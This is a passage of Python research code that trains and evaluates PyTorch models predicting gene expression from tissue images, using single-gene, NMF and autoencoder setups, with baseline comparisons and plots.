plot_SingleGene_PredAndTrue_ScatterComparison(ds_train, M_pred_single_gene, M_truth_single_gene, model_name, dataset_name + ' Train', hyperparams['gene_name'])
plot_SingleGene_PredAndTrue_ColorVisualisation(ds_train, M_pred_single_gene, M_truth_single_gene, model_name, dataset_name + ' Train', hyperparams['gene_name'])
# plot comparisons of M_fast_rec and M_truth
plot_SingleGene_PredAndTrue_ScatterComparison(ds_train, M_fast_rec_single_gene, M_truth_single_gene, 'fast_rec', dataset_name + ' Train', hyperparams['gene_name'])
plot_SingleGene_PredAndTrue_ColorVisualisation(ds_train, M_fast_rec_single_gene, M_truth_single_gene, 'fast_rec', dataset_name + ' Train', hyperparams['gene_name'])
### perform on TEST data ###
print("\n## perform on TEST data ##")
M_truth_test, M_pred_test = getFullDimsPrediction_with_NMF_DS(dataset=ds_test, W=ds_train.W, model=trained_model, device=device)
# test-error comparisons: M_truth ~ M_pred
# orig_matrix ~ W * H_pred
print("matrix comparsions on all genes ...")
num_cols = M_truth_test.shape[1]
baseline = np.tile(A=np.average(M_truth, axis=1).reshape(-1,1), reps=(1,num_cols)) # NOTE: this is on TRAIN DATA !!! # create an average of every gene's value on all of the samples - then multiply the result in the num of samples. meaning, each sample has the average value of each gene # NOTE: see the reshape to turn the `row` into a `column`
compare_matrices(M_truth_test, M_pred_test, Baseline=baseline)
# prepare for the plots of the chosen gene:
print("results plot & vector comparsions on the chosen single gene ...")
M_pred_single_gene = M_pred_test[test_gene_index, :].transpose().squeeze()
M_truth_single_gene = M_truth_test[test_gene_index, :].transpose().squeeze()
baseline_single_gene = baseline[test_gene_index, :].squeeze()
compare_matrices(M_truth_single_gene, M_pred_single_gene, Baseline=baseline_single_gene)
# plot comparisons of M_pred and M_truth
plot_SingleGene_PredAndTrue_ScatterComparison(ds_test, M_pred_single_gene, M_truth_single_gene, model_name, dataset_name + ' Test', hyperparams['gene_name'])
plot_SingleGene_PredAndTrue_ColorVisualisation(ds_test, M_pred_single_gene, M_truth_single_gene, model_name, dataset_name + ' Test', hyperparams['gene_name'])
elif dataset_name.startswith("AE"):
#
train_gene_index = hyperparams['geneRowIndexIn_Reduced_Train_matrix_df']
test_gene_index = hyperparams['geneRowIndexIn_Reduced_Test_matrix_df']
### perform on TRAIN data ###
print("\n## perform on TRAIN data ##")
M_truth, M_pred = getFullDimsPrediction_with_AE_DS(dataset=ds_train, AEnet=ds_train.autoEncoder, model=trained_model, device=device)
# train-error comparisons: M_truth ~ M_fast_reconstruction ~ M_pred
# orig_matrix ~ Decode(Encode(M)) ~ Decode(Predict(X))
M_fast_reconstruction = getAutoEncoder_M_fast_reconstruction(dataset=ds_train, model=trained_model, device=device)
print("matrix comparsions on all genes ...")
compare_matrices(M_truth, M_pred, Baseline=M_fast_reconstruction)
# prepare for the plots of the chosen gene:
print("results plot & vector comparsions on the chosen single gene ...")
M_pred_single_gene = M_pred[train_gene_index,:].transpose().squeeze()
M_truth_single_gene = M_truth[train_gene_index,:].transpose().squeeze()
M_fast_rec_single_gene = M_fast_reconstruction[train_gene_index,:].transpose().squeeze()
compare_matrices(M_truth_single_gene, M_pred_single_gene, Baseline=M_fast_rec_single_gene)
# plot comparisons of M_pred and M_truth
plot_SingleGene_PredAndTrue_ScatterComparison(ds_train, M_pred_single_gene, M_truth_single_gene, model_name, dataset_name + ' Train', hyperparams['gene_name'])
plot_SingleGene_PredAndTrue_ColorVisualisation(ds_train, M_pred_single_gene, M_truth_single_gene, model_name, dataset_name + ' Train', hyperparams['gene_name'])
# plot comparisons of M_fast_rec and M_truth
plot_SingleGene_PredAndTrue_ScatterComparison(ds_train, M_fast_rec_single_gene, M_truth_single_gene, 'fast_rec', dataset_name + ' Train', hyperparams['gene_name'])
plot_SingleGene_PredAndTrue_ColorVisualisation(ds_train, M_fast_rec_single_gene, M_truth_single_gene, 'fast_rec', dataset_name + ' Train', hyperparams['gene_name'])
### perform on TEST data ###
print("\n## perform on TEST data ##")
M_truth_test, M_pred_test = getFullDimsPrediction_with_AE_DS(dataset=ds_test, AEnet=ds_train.autoEncoder, model=trained_model, device=device)
# test-error comparisons: M_truth ~ M_pred
# orig_matrix ~ W * H_pred
print("matrix comparsions on all genes ...")
num_cols = M_truth_test.shape[1]
baseline = np.tile(A=np.average(M_truth, axis=1).reshape(-1,1), reps=(1,num_cols)) # NOTE: this is on TRAIN DATA !!! # create an average of every gene's value on all of the samples - then multiply the result in the num of samples. meaning, each sample has the average value of each gene # NOTE: see the reshape to turn the `row` into a `column`
compare_matrices(M_truth_test, M_pred_test, Baseline=baseline)
# prepare for the plots of the chosen gene:
print("results plot & vector comparsions on the chosen single gene ...")
M_pred_single_gene = M_pred_test[test_gene_index, :].transpose().squeeze()
M_truth_single_gene = M_truth_test[test_gene_index, :].transpose().squeeze()
baseline_single_gene = baseline[test_gene_index, :].squeeze()
compare_matrices(M_truth_single_gene, M_pred_single_gene, Baseline=baseline_single_gene)
# plot comparisons of M_pred and M_truth
plot_SingleGene_PredAndTrue_ScatterComparison(ds_test, M_pred_single_gene, M_truth_single_gene, model_name, dataset_name + ' Test', hyperparams['gene_name'])
plot_SingleGene_PredAndTrue_ColorVisualisation(ds_test, M_pred_single_gene, M_truth_single_gene, model_name, dataset_name + ' Test', hyperparams['gene_name'])
# delete unneeded tesnors from GPU to save space
del trained_model
# goodbye
print("\n----- finished function runExperiment -----")
pass
def runExperiment_mandalay(ds_train_list : list, ds_test : Dataset, hyperparams, device, model_name, dataset_name):
'''
**runExperimentWithModel_BasicConvNet**
this function performs 2 things:
(1) Trains the model on ALL training data - one train ds at a time
(2) Tests the model on patient 2 data (test data)
'''
print("\n----- entered function runExperiment_mandalay -----")
'''
prepare model, loss and optimizer instances
'''
# create the model
model = get_model_by_name_Mandalay(name=model_name, dataset=ds_train_list[0], hyperparams=hyperparams) #TODO: note that <- `dataset=ds_train_list[0]`
# create the loss function and optimizer
loss_fn = torch.nn.MSELoss()
optimizer = torch.optim.Adam(model.parameters(), lr=hyperparams['learning_rate'])
'''
Train the model
'''
trained_model = model # initial assignment
for index, ds_train in enumerate(ds_train_list):
print(f'now training model on the DS (ds_train) indexed {index}')
trained_model = train_prediction_model(model_to_train=trained_model, ds_train=ds_train, loss_fn=loss_fn,
optimizer=optimizer, hyperparams=hyperparams,
model_name=model_name, dataset_name=dataset_name, device=device)
'''
Test the model by its type on the train and test datasets, and print comparisons
NOTE: in the K genes experiments the matrices are of shape (num of samples, k)
BUT in NMF and AE the matrices are TRANSPOSED and are of shape (num of genes, num of samples)
'''
if dataset_name.startswith("single_gene"):
# perform on TRAIN data
print("\n## perform on TRAIN data ##")
M_truth, M_pred = getSingleDimPrediction(dataset=ds_train_list[-1], model=trained_model, device=device) # TODO: Note: the last item in ds_train_list is supposed to be "patient1" and thats why `dataset=ds_train_list[-1]`
baseline = np.full(shape=M_truth.shape, fill_value=np.average(M_truth)) # `full` creates an array of wanted size where all values are the same fill value
compare_matrices(M_truth, M_pred, Baseline=baseline)
plot_SingleGene_PredAndTrue_ScatterComparison(ds_train, M_pred, M_truth, model_name, dataset_name + ' Train', hyperparams['gene_name'])
plot_SingleGene_PredAndTrue_ColorVisualisation_Mandalay(ds_train, M_pred, M_truth, model_name, dataset_name + ' Train', hyperparams['gene_name'])
# perform on TEST data
print("\n## perform on TEST data ##")
M_truth_test, M_pred_test = getSingleDimPrediction(dataset=ds_test, model=trained_model, device=device)
baseline = np.full(shape=M_truth_test.shape, fill_value=np.average(M_truth)) #NOTE: shape of TEST data, filled with TRAIN data avg !!! # `full` creates an array of wanted size where all values are the same fill value
compare_matrices(M_truth_test, M_pred_test, Baseline=baseline) #NOTE: same baseline as above - the TRAIN baseline
plot_SingleGene_PredAndTrue_ScatterComparison(ds_test, M_pred_test, M_truth_test, model_name, dataset_name + ' Test', hyperparams['gene_name'])
plot_SingleGene_PredAndTrue_ColorVisualisation_Mandalay(ds_test, M_pred_test, M_truth_test, model_name, dataset_name + ' Test', hyperparams['gene_name'])
# print("\n## VERIFICATIONS 091020 ##") #TODO: delete later
# save to csv file
# savetxt('single_gene_test_pred_from_K_genes_exp.csv', M_pred_test, delimiter=',')
# delete unneeded tesnors from GPU to save space
del trained_model
# goodbye
print("\n----- finished function runExperiment -----")
pass
def runExperiment_mandalay_combined_ds(combined_ds_train : Dataset, ds_test : Dataset, hyperparams, device, model_name, dataset_name):
'''
**runExperimentWithModel_BasicConvNet**
this function performs 2 things:
(1) Trains the model on ALL training data - one train ds at a time
(2) Tests the model on patient 2 data (test data)
'''
print("\n----- entered function runExperiment_mandalay -----")
'''
prepare model, loss and optimizer instances
'''
# create the model
model = get_model_by_name_Mandalay(name=model_name, dataset=combined_ds_train.list_of_datasets[-1], hyperparams=hyperparams) #TODO: note that <- `dataset=ds_train_list[0]`
# create the loss function and optimizer
loss_fn = torch.nn.MSELoss()
optimizer = torch.optim.Adam(model.parameters(), lr=hyperparams['learning_rate'])
'''
Train the model
'''
trained_model = model # initial assignment
trained_model = train_prediction_model(model_to_train=trained_model, ds_train=combined_ds_train, loss_fn=loss_fn,
optimizer=optimizer, hyperparams=hyperparams,
model_name=model_name, dataset_name=dataset_name, device=device)
'''
Test the model by its type on the train and test datasets, and print comparisons
NOTE: in the K genes experiments the matrices are of shape (num of samples, k)
BUT in NMF and AE the matrices are TRANSPOSED and are of shape (num of genes, num of samples)
'''
if dataset_name.startswith("single_gene"):
# perform on TRAIN data
print("\n## perform on TRAIN data ##")
M_truth, M_pred = getSingleDimPrediction(dataset=combined_ds_train.list_of_datasets[-1], model=trained_model, device=device) # TODO: Note!!!: the last item in ds_train_list is supposed to be "patient1" and thats why `dataset=ds_train_list[-1]`
baseline = np.full(shape=M_truth.shape, fill_value=np.average(M_truth)) # `full` creates an array of wanted size where all values are the same fill value
compare_matrices(M_truth, M_pred, Baseline=baseline)
plot_SingleGene_PredAndTrue_ScatterComparison(combined_ds_train.list_of_datasets[-1], M_pred, M_truth, model_name, dataset_name + ' Train', hyperparams['gene_name']) # the combined DS isnt used, thats why its ok to send it there
# plot_SingleGene_PredAndTrue_ColorVisualisation_Mandalay(combined_ds_train, M_pred, M_truth, model_name, dataset_name + ' Train', hyperparams['gene_name'])
plot_SingleGene_PredAndTrue_ColorVisualisation_Mandalay(combined_ds_train.list_of_datasets[-1], M_pred, M_truth, model_name, dataset_name + ' Train', hyperparams['gene_name'])
# perform on TEST data
print("\n## perform on TEST data ##")
M_truth_test, M_pred_test = getSingleDimPrediction(dataset=ds_test, model=trained_model, device=device)
baseline = np.full(shape=M_truth_test.shape, fill_value=np.average(M_truth)) #NOTE: shape of TEST data, filled with TRAIN data avg !!! # `full` creates an array of wanted size where all values are the same fill value
compare_matrices(M_truth_test, M_pred_test, Baseline=baseline) #NOTE: same baseline as above - the TRAIN baseline
plot_SingleGene_PredAndTrue_ScatterComparison(ds_test, M_pred_test, M_truth_test, model_name, dataset_name + ' Test', hyperparams['gene_name']) # the combined DS isnt used, thats why its ok to send it there
# plot_SingleGene_PredAndTrue_ColorVisualisation_Mandalay(ds_test, M_pred_test, M_truth_test, model_name, dataset_name + ' Test', hyperparams['gene_name'])
plot_SingleGene_PredAndTrue_ColorVisualisation_Mandalay(ds_test, M_pred_test, M_truth_test, model_name, dataset_name + ' Test', hyperparams['gene_name'])
# print("\n## VERIFICATIONS 091020 ##") #TODO: delete later
# save to csv file
# savetxt('single_gene_test_pred_from_K_genes_exp.csv', M_pred_test, delimiter=',')
# delete unneeded tesnors from GPU to save space
del trained_model
# goodbye
print("\n----- finished function runExperiment -----")
pass
def getSingleDimPrediction(dataset, model, device):
'''
REMINDER:
in 1 dim prediction experiment we chose a single gene from matrix_df
and then we trained the model to predict a 1-dimensional vector meaning - to y values for that gene
Predict(one_image) = single y value
THIS FUNCTION:
we will test our model on all of the images from the test dataset !
we will predict:
Predict(all_images) = vector of size (all_images_amount x 1)
lets denote M_truth to be the test dataframe matrix that contains all K values.
if we denote that vector as y_pred == M_pred then we will want to compare between:
M_pred ~ M_truth
also, since these should be both 1-d vectors, we will perform a scatter plot of the result !
'''
print("\n----- entered function getSingleDimPrediction -----")
'''
prepare the data
'''
'''
prepare the data
'''
# define the batch size for the dataloader
batch_size = 25
dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=False) #NOTE: important !!! shuffle here MUST be false or all order is lost !!!
# check if dataset is augmented (=has x8 more images than the original dataset).
# note that if the dataset is augmented, we are talking about the training dataset - and if not it is the testing dataset
# if the dataset is augmented, then we need to use here (= in the experiment and NOT in training) only the UNAUGMENTED images.
# ASSUMPTION: the augmented dataset's image folder object is a concatanation dataset created by me.
# the first `dataset.num_of_images_with_no_augmentation` images from it are the only ones i need for the experiment.
num_of_batches = 0
augmented_flag = False
remainder = -1
if dataset.size_of_dataset != dataset.num_of_images_with_no_augmentation: # meaning this dataset is augmented, meaning this is a TRAIN dataset
num_of_batches = (dataset.num_of_images_with_no_augmentation // batch_size)
augmented_flag = True
if (dataset.num_of_images_with_no_augmentation % batch_size) != 0:
num_of_batches = num_of_batches + 1
remainder = dataset.num_of_images_with_no_augmentation % batch_size
else: # meaning this dataset is NOT augmented, meaning this is a TEST dataset
num_of_batches = (len(dataset) // batch_size)
if (len(dataset) % batch_size) != 0:
num_of_batches = num_of_batches + 1
# create the dataloader
dl_iter = iter(dataloader)
# define an empty variable for the model's forward pass iterations
y_pred_final = None
for batch_index in range(num_of_batches):
with torch.no_grad(): # no need to keep track of gradients since we are only using the forward of the model
#print(f'batch {batch_index+1} of {num_of_batches} batches', end='\r') # "end='\r'" will cause the line to be overwritten the next print that comes
# \r doesnt work on a text file
data = next(dl_iter)
#x, _, _ = data # x.shape should be (all_images_size, 3, 176, 176) # TODO: NOTE this is changed in 191120 to the following line below
x = data[0] # TODO NOTE: changed in 191120 because there is no 3rd argument in the new mandalay version
# small correction if this is an augmented dataset and this is the LAST batch ... we dont want the augmented images
if batch_index == num_of_batches-1 and augmented_flag is True and remainder != -1:
split_result = torch.split(tensor=x, split_size_or_sections=remainder, dim=0) # dim=0 means split on batch size
x = split_result[0]
# load to device
if device.type == 'cuda':
x = x.to(device=device)
'''
feed data to model to get K dim result
'''
# # This nex lines is to heavy for the GPU (apparantly); and so it is divided into small portions
y_pred = model(x)
if y_pred_final is None: # means this is the first time the prediction occured == first iteration of the loop
y_pred_final = y_pred.cpu().detach().numpy()
else: # means this is not the first time
# in that case, we will "stack" (concatanate) numpy arrays
# np.vstack: # Stack arrays in sequence vertically (row wise) !
y_pred_curr_prepared = y_pred.cpu().detach().numpy()
y_pred_final = np.vstack((y_pred_final, y_pred_curr_prepared))
# delete vectors used from the GPU
del x
# finished loop
'''
***
'''
# get M_pred
M_pred = y_pred_final
# get M_truth
M_truth = dataset.reduced_dataframe.to_numpy() # this is the full 33538 dimensional vector (or 18070~ after reduction) from the original dataframe
# assert equal sizes
M_truth = M_truth.transpose() #NOTE the transpose here to match the shapes !!!
M_pred = M_pred.squeeze()
M_truth = M_truth.squeeze()
print(f'M_pred.shape {M_pred.shape} ?==? M_truth.shape {M_truth.shape}')
assert M_pred.shape == M_truth.shape
### final print
print(f'Reached end of the function, printing information about the prediction vs the truth values')
temp_df = pd.DataFrame({'M_truth':M_truth, 'M_pred':M_pred})
print(temp_df)
print("\n----- finished function getSingleDimPrediction -----")
#
return M_truth, M_pred
def getKDimPrediction(dataset, model, device):
'''
REMINDER:
in K dim prediction experiment we chose the K genes with the highest variance from matrix_df
and then we trained the model to predict a k-dimensional vector meaning - to predict k genes (for a single image)
Predict(one_image) = vector of size (1 x K)
THIS FUNCTION:
we will test our model on the K-genes with the highest varience from the test dataset !
we will predict:
Predict(all_images) = vector of size (all_images_amount x K)
lets denote M_truth to be the test dataframe matrix that contains all K values.
if we denote that vector as y_pred == M_pred then we will want to compare between:
M_pred ~ M_truth
'''
print("\n----- entered function getKDimPrediction -----")
'''
prepare the data
'''
# define the batch size for the dataloader
batch_size = 20
dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=False) #NOTE: important !!! shuffle here MUST be false or all order is lost !!!
# check if dataset is augmented (=has x8 more images than the original dataset).
# note that if the dataset is augmented, we are talking about the training dataset - and if not it is the testing dataset
# if the dataset is augmented, then we need to use here (= in the experiment and NOT in training) only the UNAUGMENTED images.
# ASSUMPTION: the augmented dataset's image folder object is a concatanation dataset created by me.
# the first `dataset.num_of_images_with_no_augmentation` images from it are the only ones i need for the experiment.
num_of_batches = 0
augmented_flag = False
remainder = -1
if dataset.size_of_dataset != dataset.num_of_images_with_no_augmentation: # meaning this dataset is augmented, meaning this is a TRAIN dataset
num_of_batches = (dataset.num_of_images_with_no_augmentation // batch_size)
augmented_flag = True
if (dataset.num_of_images_with_no_augmentation % batch_size) != 0:
num_of_batches = num_of_batches + 1
remainder = dataset.num_of_images_with_no_augmentation % batch_size
else: # meaning this dataset is NOT augmented, meaning this is a TEST dataset
num_of_batches = (len(dataset) // batch_size)
if (len(dataset) % batch_size) != 0:
num_of_batches = num_of_batches + 1
# create the dataloader
dl_iter = iter(dataloader)
# define an empty variable for the model's forward pass iterations
y_pred_final = None
for batch_index in range(num_of_batches):
with torch.no_grad(): # no need to keep track of gradients since we are only using the forward of the model
#print(f'batch {batch_index+1} of {num_of_batches} batches', end='\r') # "end='\r'" will cause the line to be overwritten the next print that comes
# \r doesnt work on a text file
data = next(dl_iter)
x, _, _ = data # x.shape should be (all_images_size, 3, 176, 176)
# small correction if this is an augmented dataset and this is the LAST batch ... we dont want the augmented images
if batch_index == num_of_batches-1 and augmented_flag is True and remainder != -1:
split_result = torch.split(tensor=x, split_size_or_sections=remainder, dim=0) # dim=0 means split on batch size
x = split_result[0]
# load to device
if device.type == 'cuda':
x = x.to(device=device)
'''
feed data to model to get K dim result
'''
# # This next line is to heavy for the GPU (apparantly); and so it is divided into small portions
y_pred = model(x)
if y_pred_final is None: # means this is the first time the prediction occured == first iteration of the loop
y_pred_final = y_pred.cpu().detach().numpy()
else: # means this is not the first time
# in that case, we will "stack" (concatanate) numpy arrays
# np.vstack: # Stack arrays in sequence vertically (row wise) !
y_pred_curr_prepared = y_pred.cpu().detach().numpy()
y_pred_final = np.vstack((y_pred_final, y_pred_curr_prepared))
# delete vectors used from the GPU
del x
# finished loop
'''
***
'''
# get M_pred
M_pred = y_pred_final
# get M_truth
M_truth = dataset.reduced_dataframe.to_numpy() # this is the full 33538 dimensional vector (or 23073~ after reduction) from the original dataframe
# assert equal sizes
M_truth = M_truth.transpose() #NOTE the transpose here to match the shapes !!!
M_pred = M_pred.squeeze()
M_truth = M_truth.squeeze()
assert M_pred.shape == M_truth.shape
print("\n----- finished function getKDimPrediction -----")
#
return M_truth, M_pred
def getFullDimsPrediction_with_NMF_DS(dataset, W, model, device):
'''
REMINDER:
NMF decomposition performs M = W * H
lets denote M == M_truth
THIS FUNCTION:
this function will perform dimension restoration using matrix multiplication:
if we denote y_pred == H_pred then:
W * H_pred = M_pred
and then if we want we can compare M_pred to M_truth
NOTE !!! in both cases of `dataset` being training or testing dataset,
W should be from the TRAINING dataset and NOT FROM the TESTING dataset !!!
'''
print("\n----- entered function getFullDimsPrediction_with_NMF_DS -----")
'''
prepare the data
'''
# define the batch size for the dataloader
batch_size = 20
dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=False) #NOTE: important !!! shuffle here MUST be false or all order is lost !!!
# check if dataset is augmented (=has x8 more images than the original dataset).
# note that if the dataset is augmented, we are talking about the training dataset - and if not it is the testing dataset
# if the dataset is augmented, then we need to use here (= in the experiment and NOT in training) only the UNAUGMENTED images.
# ASSUMPTION: the augmented dataset's image folder object is a concatanation dataset created by me.
# the first `dataset.num_of_images_with_no_augmentation` images from it are the only ones i need for the experiment.
num_of_batches = 0
augmented_flag = False
remainder = -1
if dataset.size_of_dataset != dataset.num_of_images_with_no_augmentation: # meaning this dataset is augmented, meaning this is a TRAIN dataset
num_of_batches = (dataset.num_of_images_with_no_augmentation // batch_size)
augmented_flag = True
if (dataset.num_of_images_with_no_augmentation % batch_size) != 0:
num_of_batches = num_of_batches + 1
remainder = dataset.num_of_images_with_no_augmentation % batch_size
else: # meaning this dataset is NOT augmented, meaning this is a TEST dataset
num_of_batches = (len(dataset) // batch_size)
if (len(dataset) % batch_size) != 0:
num_of_batches = num_of_batches + 1
# create the dataloader
dl_iter = iter(dataloader)
# define an empty variable for the model's forward pass iterations
y_pred_final = None
for batch_index in range(num_of_batches):
with torch.no_grad(): # no need to keep track of gradients since we are only using the forward of the model
#print(f'batch {batch_index+1} of {num_of_batches} batches', end='\r') # "end='\r'" will cause the line to be overwritten the next print that comes
# \r doesnt work on a text file
data = next(dl_iter)
x, _, _ = data # x.shape should be (all_images_size, 3, 176, 176)
# small correction if this is an augmented dataset and this is the LAST batch ... we dont want the augmented images
if batch_index == num_of_batches-1 and augmented_flag is True and remainder != -1:
split_result = torch.split(tensor=x, split_size_or_sections=remainder, dim=0) # dim=0 means split on batch size
x = split_result[0]
# load to device
if device.type == 'cuda':
x = x.to(device=device)
'''
feed data to model to get K dim result
'''
# # This next line is to heavy for the GPU (apparantly); and so it is divided into small portions
y_pred = model(x)
if y_pred_final is None: # means this is the first time the prediction occured == first iteration of the loop
y_pred_final = y_pred.cpu().detach().numpy()
else: # means this is not the first time
# in that case, we will "stack" (concatanate) numpy arrays
# np.vstack: # Stack arrays in sequence vertically (row wise) !
y_pred_curr_prepared = y_pred.cpu().detach().numpy()
y_pred_final = np.vstack((y_pred_final, y_pred_curr_prepared))
# delete vectors used from the GPU
del x
# finished loop
'''
restore dimension to y_pred by performing: res = W * y_pred = M_pred
(33538 x K) * (K * num_of_images) = (33538 x num_of_images)
the number 33538 might change due to pre-processing steps
'''
# both vecotors need a little preparation for the multiplication
y_pred_prepared = y_pred_final.transpose() #note the transpose here !
W_prepared = W
# get M_pred
# # NOTE: the cuda tesnor needs a little conversion first from cuda to cpu and to the right dimension
M_pred = np.matmul(W_prepared, y_pred_prepared)
# get M_truth
M_truth = dataset.matrix_dataframe.to_numpy() # this is the full 33538 dimensional vector (or 23073~ after reduction) from the original dataframe
# assert equal sizes
M_pred = M_pred.squeeze()
M_truth = M_truth.squeeze()
assert M_pred.shape == M_truth.shape
print("\n----- finished function getFullDimsPrediction_with_NMF_DS -----")
#
return M_truth, M_pred
def getFullDimsPrediction_with_AE_DS(dataset, AEnet, model, device):
'''
REMINDER:
we recieved our y values from the latent space using the pre-trained encoder
y_pred was recieved due to:
note that y_pred == Predict(X)
THIS FUNCTION:
this function will perform dimension restoration using the decoder
we denote Decode(y_pred) == Decode(Predict(X)) == M_pred
and M_truth as the original matrix
and then if we want we can compare M_pred to M_truth
NOTE !!! in both cases of `dataset` being training or testing dataset,
AEnet should be from the TRAINING dataset and NOT FROM the TESTING dataset !!!
'''
print("\n----- entered function getFullDimsPrediction_with_AE_DS -----")
'''
prepare the data
'''
# printInfoAboutDataset(dataset)
batch_size = 1 ### NOTE: Important !!! the reason this is 1 it to correlate with the way we trained the AE net... see "return_trained_AE_net" in loadAndPreProcess.py .
dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=False) #NOTE: important !!! shuffle here MUST be false or all order is lost !!!
# check if dataset is augmented (=has x8 more images than the original dataset).
# note that if the dataset is augmented, we are talking about the training dataset - and if not it is the testing dataset
# if the dataset is augmented, then we need to use here (= in the experiment and NOT in training) only the UNAUGMENTED images.
# ASSUMPTION: the augmented dataset's image folder object is a concatanation dataset created by me.
# the first `dataset.num_of_images_with_no_augmentation` images from it are the only ones i need for the experiment.
num_of_batches = 0
augmented_flag = False
remainder = -1
if dataset.size_of_dataset != dataset.num_of_images_with_no_augmentation: # meaning this dataset is augmented, meaning this is a TRAIN dataset
num_of_batches = (dataset.num_of_images_with_no_augmentation // batch_size)
augmented_flag = True
if (dataset.num_of_images_with_no_augmentation % batch_size) != 0:
num_of_batches = num_of_batches + 1
remainder = dataset.num_of_images_with_no_augmentation % batch_size
else: # meaning this dataset is NOT augmented, meaning this is a TEST dataset
num_of_batches = (len(dataset) // batch_size)
if (len(dataset) % batch_size) != 0:
num_of_batches = num_of_batches + 1
# create the dataloader
dl_iter = iter(dataloader)
# define an empty variable for the model's forward pass iterations
y_pred_final = None
'''
run the model on our data,
and when the model is done, decode the result.
the decoded results will be stacked together - and will add up to become M_pred
'''
for batch_index in range(num_of_batches):
with torch.no_grad(): # no need to keep track of gradients since we are only using the forward of the model
#print(f'batch {batch_index+1} of {num_of_batches} batches', end='\r') # "end='\r'" will cause the line to be overwritten the next print that comes
# \r doesnt work on a text file
data = next(dl_iter)
x, _, _ = data # x.shape should be (all_images_size, 3, 176, 176)
# small correction if this is an augmented dataset and this is the LAST batch ... we dont want the augmented images
if batch_index == num_of_batches-1 and augmented_flag is True and remainder != -1:
split_result = torch.split(tensor=x, split_size_or_sections=remainder, dim=0) # dim=0 means split on batch size
x = split_result[0]
# load to device
if device.type == 'cuda':
x = x.to(device=device)
'''
feed data to model to get K dim result
'''
y_pred = model(x)
'''
get the decoded version of the network's output, conver it to numpy on the cpu, and stack it for later usage
'''
y_pred_decoded = AEnet.decodeWrapper(y_pred)
if y_pred_final is None: # means this is the first time the prediction occured == first iteration of the loop
y_pred_final = y_pred_decoded.cpu().detach().numpy()
else: # means this is not the first time
# in that case, we will "stack" (concatanate) numpy arrays
# np.vstack: # Stack arrays in sequence vertically (row wise) !
y_pred_curr_prepared = y_pred_decoded.cpu().detach().numpy()
y_pred_final = np.vstack((y_pred_final, y_pred_curr_prepared))
# delete vectors used from the GPU
del x
# finished loop
'''
restore dimension to y_pred by using the decoder
'''
# restore dimension to y_pred by using the decoder (from our pre-trained autoencoder)
M_pred = y_pred_final.transpose() #NOTE the transpose - it is used to allign shapes with M_truth
# get M_truth
M_truth = dataset.matrix_dataframe.to_numpy() # this is the full 33538 dimensional vector (or 23073~ after reduction) from the original dataframe
# assert equal sizes
M_pred = M_pred.squeeze()
M_truth = M_truth.squeeze()
assert M_pred.shape == M_truth.shape
print("\n----- finished function getFullDimsPrediction_with_AE_DS -----")
#
return M_truth, M_pred
def getAutoEncoder_M_fast_reconstruction(dataset, model, device):
'''
perform a fast decoding and encoding to our matrix dataframe using the trained AE net - without any other training
'''
print("\n----- entered function getAutoEncoder_M_fast_reconstruction -----")
'''
preparations
'''
batch_size = 1 ### NOTE: Important !!! the reason this is 1 it to correlate with the way we trained the AE net... see "return_trained_AE_net" in loadAndPreProcess.py .
dataloader = DataLoader(dataset.dataset_from_matrix_df, batch_size=batch_size, shuffle=False) #NOTE: important !!! shuffle here MUST be false or all order is lost !!!
# note what dataset is used ^^^^
# check if dataset is augmented (=has x8 more images than the original dataset).
# note that if the dataset is augmented, we are talking about the training dataset - and if not it is the testing dataset
# if the dataset is augmented, then we need to use here (= in the experiment and NOT in training) only the UNAUGMENTED images.
# ASSUMPTION: the augmented dataset's image folder object is a concatanation dataset created by me.
# the first `dataset.num_of_images_with_no_augmentation` images from it are the only ones i need for the experiment.
num_of_batches = 0
augmented_flag = False
remainder = -1
if dataset.size_of_dataset != dataset.num_of_images_with_no_augmentation: # meaning this dataset is augmented, meaning this is a TRAIN dataset
num_of_batches = (dataset.num_of_images_with_no_augmentation // batch_size)
augmented_flag = True
if (dataset.num_of_images_with_no_augmentation % batch_size) != 0:
num_of_batches = num_of_batches + 1
remainder = dataset.num_of_images_with_no_augmentation % batch_size
else: # meaning this dataset is NOT augmented, meaning this is a TEST dataset
num_of_batches = (len(dataset) // batch_size)
if (len(dataset) % batch_size) != 0:
num_of_batches = num_of_batches + 1
# create the dataloader
dl_iter = iter(dataloader)
# define an empty variable for the model's forward pass iterations
result = None
'''
run the model on our data,
and when the model is done, decode the result.
the decoded results will be stacked together - and will add up to become M_pred
'''
for batch_index in range(num_of_batches):
with torch.no_grad(): # no need to keep track of gradients since we are only using the forward of the model
print(f'batch {batch_index+1} of {num_of_batches} batches', end='\r') # "end='\r'" will cause the line to be overwritten the next print that comes
data = next(dl_iter)
x = data # x.shape should be (all_images_size, 3, 176, 176)
x = x.float() # needed to avoid errors of conversion
# small correction if this is an augmented dataset and this is the LAST batch ... we dont want the augmented images
if batch_index == num_of_batches-1 and augmented_flag is True and remainder != -1:
split_result = torch.split(tensor=x, split_size_or_sections=remainder, dim=0) # dim=0 means split on batch size
x = split_result[0]
# load to device
if device.type == 'cuda':
x = x.to(device=device)
# get the encoded version
y_pred_encoded = dataset.autoEncoder.encodeWrapper(x)
# get the decoded version
y_pred_decoded = dataset.autoEncoder.decodeWrapper(y_pred_encoded)
if result is None: # means this is the first time the prediction occured == first iteration of the loop
result = y_pred_decoded.cpu().detach().numpy()
else: # means this is not the first time
# in that case, we will "stack" (concatanate) numpy arrays
# np.vstack: # Stack arrays in sequence vertically (row wise) !
y_pred_curr_prepared = y_pred_decoded.cpu().detach().numpy()
result = np.vstack((result, y_pred_curr_prepared))
# delete vectors used from the GPU
del x
# finished loop
'''
finish up
'''
M_fast_reconstruction = result.transpose() #NOTE the transpose - it is used to allign shapes with M_truth
# assert equal sizes
assert M_fast_reconstruction.shape == dataset.matrix_dataframe.to_numpy().shape
print("\n----- finished function getAutoEncoder_M_fast_reconstruction -----")
#
return M_fast_reconstruction
def get_model_by_name(name, dataset, hyperparams):
'''
prep:
'''
x0, y0, _ = dataset[0] # NOTE that the third argument recieved here is "column" and is not currently needed
in_size = x0.shape # note: if we need for some reason to add batch dimension to the image (from [3,176,176] to [1,3,176,176]) use x0 = x0.unsqueeze(0) # ".to(device)"
output_size = 1 if isinstance(y0, int) or isinstance(y0, float) else y0.shape[0] # NOTE: if y0 is an int, than the size of the y0 tensor is 1. else, its size is K (K == y0.shape)
'''
get_model_by_name
'''
if name == 'BasicConvNet':
